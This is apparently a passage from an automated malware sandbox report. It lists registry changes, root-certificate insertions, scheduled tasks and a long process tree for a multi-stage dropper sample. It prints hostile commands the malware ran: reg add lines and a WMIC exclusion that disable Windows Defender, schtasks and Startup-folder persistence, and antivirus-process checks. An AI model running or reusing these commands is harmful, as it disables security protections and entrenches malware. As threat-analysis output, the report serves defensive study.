| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Roaming\hk0hesKyTJ.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Roaming\DHE0skkKWT.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Roaming\DHE0skkKWT.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\hk0hesKyTJ.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| N/A | N/A | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\1ed4a8b4c74aab435ea5cd459d5ac961e5a8ca28924801bd84d336135f30efde.exe
"C:\Users\Admin\AppData\Local\Temp\1ed4a8b4c74aab435ea5cd459d5ac961e5a8ca28924801bd84d336135f30efde.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe
"C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe"
C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe
"C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe
"C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe"
C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe
"C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\TpBxXTKipS.exe
"C:\Users\Admin\AppData\Roaming\TpBxXTKipS.exe"
C:\Users\Admin\AppData\Roaming\hk0hesKyTJ.exe
"C:\Users\Admin\AppData\Roaming\hk0hesKyTJ.exe"
C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe
"C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe"
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
C:\Users\Admin\AppData\Local\Temp\1000223001\5133bb271c.exe
"C:\Users\Admin\AppData\Local\Temp\1000223001\5133bb271c.exe"
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe
"C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit
C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe
"C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe"
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Users\Admin\AppData\Roaming\DHE0skkKWT.exe
"C:\Users\Admin\AppData\Roaming\DHE0skkKWT.exe"
C:\Users\Admin\AppData\Roaming\JHzjOZpXEJ.exe
"C:\Users\Admin\AppData\Roaming\JHzjOZpXEJ.exe"
C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
"C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Users\Admin\AppData\Local\Temp\7zSE14.tmp\Install.exe
.\Install.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c md 684126
C:\Windows\SysWOW64\findstr.exe
findstr /V "VegetablesIndividualBindingGba" Ever
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C
C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif
Intake.pif C
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
"C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe"
C:\Users\Admin\AppData\Local\Temp\7zS1112.tmp\Install.exe
.\Install.exe /Kudide "385107" /S
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4804 -ip 4804
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4804 -s 516
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe
"C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe"
C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
"C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe
"C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bDxiLwhXhHymEtvbIE" /SC once /ST 02:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS1112.tmp\Install.exe\" Jk /ufdiddYu 385107 /S" /V1 /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
"C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
"C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
C:\Users\Admin\AppData\Local\Temp\1000305001\acentric.exe
"C:\Users\Admin\AppData\Local\Temp\1000305001\acentric.exe"
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\AppData\Local\Temp\1000260001\5KNCHALAH.exe
"C:\Users\Admin\AppData\Local\Temp\1000260001\5KNCHALAH.exe"
C:\Users\Admin\AppData\Local\Temp\1000265001\broadcom5.exe
"C:\Users\Admin\AppData\Local\Temp\1000265001\broadcom5.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\Explorer.exe
"C:\Windows\SysWOW64\Explorer.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\service123.exe
"C:\Users\Admin\AppData\Local\Temp\service123.exe"
C:\Users\Admin\AppData\Local\Temp\service123.exe
"C:\Users\Admin\AppData\Local\Temp\service123.exe"
C:\Users\Admin\AppData\Local\Temp\1000266001\broadcom6.exe
"C:\Users\Admin\AppData\Local\Temp\1000266001\broadcom6.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
C:\Users\Admin\AppData\Local\Temp\1000267001\ldx111.exe
"C:\Users\Admin\AppData\Local\Temp\1000267001\ldx111.exe"
C:\Users\Admin\AppData\Local\Temp\1000269001\acentric.exe
"C:\Users\Admin\AppData\Local\Temp\1000269001\acentric.exe"
C:\Users\Admin\AppData\Local\Temp\km111.exe
"C:\Users\Admin\AppData\Local\Temp\km111.exe"
C:\Users\Admin\AppData\Local\Temp\1000267001\ldx111.exe
"C:\Users\Admin\AppData\Local\Temp\1000267001\ldx111.exe"
C:\Users\Admin\AppData\Local\Temp\km111.exe
"C:\Users\Admin\AppData\Local\Temp\km111.exe"
C:\Users\Admin\AppData\Local\Temp\7zS1112.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS1112.tmp\Install.exe Jk /ufdiddYu 385107 /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
